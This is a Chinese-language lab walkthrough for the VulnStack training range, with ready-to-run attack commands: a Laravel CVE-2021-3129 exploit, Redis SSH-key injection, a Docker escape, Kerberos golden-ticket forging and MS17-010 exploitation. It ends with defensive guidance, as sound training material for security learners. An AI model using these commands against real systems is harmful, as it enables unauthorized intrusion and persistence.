红日VulnStack靶场环境搭建指南:3网段拓扑与5台主机配置避坑要点
红日VulnStack靶场深度实战三层网络攻防全流程解析1. 靶场环境架构与核心价值红日安全团队打造的VulnStack靶场已成为国内学习ATTCK框架的黄金标准。这个高度仿真的内网环境模拟了企业级网络攻防场景特别适合从初级到高级的安全从业者提升实战能力。靶场采用典型的三层网络架构DMZ区/二层网络/三层网络包含5台异构主机Ubuntu、Windows 7、Windows Server等完美复现了真实企业网络中的隔离策略和信任关系。靶场核心价值体现在三个维度技术覆盖全面从外网打点到横向移动完整覆盖ATTCK矩阵中的14项战术场景真实性强包含Docker逃逸、域渗透、中间件漏洞等企业常见风险点学习曲线平滑通过渐进式难度设计让学习者逐步掌握内网渗透方法论2. 环境配置关键步骤2.1 网络拓扑搭建靶场网络分为三个安全区域各区域IP分配及通信规则如下网络区域IP段出网权限包含主机DMZ区192.168.36.1/24可出网Ubuntu (Web1)双网卡第二层网络192.168.52.1/24不可出网Ubuntu (Web2)、Windows 7(PC1)第三层网络192.168.93.1/24不可出网Windows Server 2012、Windows 7(PC2)网络配置要点VMware需为每台主机配置适配器数量及模式# Ubuntu (Web1)示例 - 网卡1NAT模式模拟公网访问 - 网卡2仅主机模式连接二层网络Windows主机需关闭防火墙以确保实验连贯性netsh advfirewall set allprofiles state off2.2 服务启动流程各主机需要启动的关键服务及命令DMZ区Ubuntusudo redis-server /etc/redis.conf sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf sudo iptables -F # 清除防火墙规则二层网络Ubuntusudo service docker start sudo docker start 8e172820ac78 # 启动特定容器三层网络Windows 7C:\MYOA\bin\AutoConfig.exe # 启动通达OA服务注意所有系统默认账户密码已预置建议实验前核对官方文档确保一致性。常见账户包括Administrator/Whoami2021等。3. 外网渗透突破口3.1 端口扫描与服务识别使用Nmap进行全端口扫描识别开放服务nmap -sV -p- 192.168.36.128典型扫描结果会显示80/81端口Nginx服务6379端口Redis数据库漏洞利用优先级评估Web应用漏洞Laravel RCERedis未授权访问其他服务弱口令3.2 Laravel Debug RCE漏洞利用针对81端口的Laravel服务v8.29.0使用公开EXP实现RCEgit clone https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP python3 exploit.py -u http://192.168.36.128:81成功后会生成Webshellhttp://192.168.36.128:81/fuckyou.php?passyour_password漏洞原理当Laravel开启Debug模式时Ignition组件对file_get_contents()和file_put_contents()的不安全使用导致攻击者可构造恶意请求触发Phar反序列化最终实现远程代码执行。3.3 Redis未授权访问利用通过Redis写SSH公钥实现权限维持# 生成密钥对 ssh-keygen -t rsa (echo -e \n\n; cat /root/.ssh/id_rsa.pub; echo -e \n\n) 1.txt # 写入目标主机 cat 1.txt | redis-cli -h 192.168.36.128 -x set hello redis-cli -h 192.168.36.128 config set dir /root/.ssh redis-cli -h 192.168.36.128 config set dbfilename authorized_keys redis-cli -h 192.168.36.128 save # SSH登录 ssh root192.168.36.1284. 内网横向移动技术4.1 Docker逃逸技术在控制Web2主机192.168.52.20后通过以下步骤检测和利用Docker特权模式环境检测ls -alh /.dockerenv # 检查Docker环境 cat /proc/1/cgroup # 查看cgroup信息 fdisk -l # 查看磁盘设备挂载逃逸mkdir /hello mount /dev/sda1 /hello # 挂载宿主机磁盘 echo ssh-rsa YOUR_PUB_KEY /hello/home/ubuntu/.ssh/authorized_keys4.2 内网信息收集使用Metasploit进行内网探测run post/multi/manage/autoroute # 添加路由 run get_local_subnets # 获取子网信息 nmap -sn -PE -T4 192.168.52.0/24 # 主机发现常见Windows域信息收集命令net view /domain net group domain admins /domain nltest /domain_trusts4.3 横向移动技术对比技术手段适用场景所需条件检测难度PsExec域环境/工作组环境管理员凭据SMB开放中等WMI远程执行域环境管理员凭据135端口开放较高计划任务所有Windows环境有效凭据较低哈希传递(PTH)域环境NTLM哈希较高票据传递(PtT)域环境Kerberos票据高5. 域渗透实战5.1 黄金票据攻击在获取krbtgt账户哈希后可伪造TGT票据kiwi_cmd golden_ticket_create /user:Administrator /domain:de1ay.com /sid:S-1-5-21-4156 /krbtgt:469d85e30803fcc042ec2c6254ee38ba /ptt关键参数/domain目标域名/sid域SID可通过whoami /all获取/krbtgtkrbtgt账户NTLM哈希5.2 利用MS17-010横向移动针对未打补丁的Windows主机use exploit/windows/smb/ms17_010_eternalblue set rhosts 192.168.93.40 set payload windows/x64/meterpreter/bind_tcp exploit防御建议及时安装MS17-010补丁关闭不必要的SMBv1协议启用网络级认证(NLA)6. 防御加固建议6.1 企业防护矩阵基于ATTCK框架的防御措施攻击阶段防护措施初始访问网络边界隔离、Web应用防火墙、漏洞管理系统横向移动网络微隔离、特权账户管理、LAPS解决方案权限提升用户权限最小化、特权进程保护、完整性级别控制持久化EDR监控、登录审计、可疑计划任务检测数据外泄DLP系统、流量加密监测、异常连接行为分析6.2 安全监控策略关键日志监控项4624账号成功登录4625账号登录失败4672特权账号登录5140网络共享访问4768-4776Kerberos认证事件SIEM检测规则示例SELECT * FROM SecurityEvents WHERE EventID IN (4624, 4625) AND TargetUserName LIKE %admin% AND LogonType 3 AND Timestamp NOW() - INTERVAL 5 MINUTE通过本靶场的系统化演练安全从业者不仅能掌握ATTCK框架中的关键技术点更能建立起从外网突破到内网控制的完整攻击视角。建议在每次演练后进行详细的日志分析对照防御检测方案查漏补缺才能真正提升企业整体安全水位。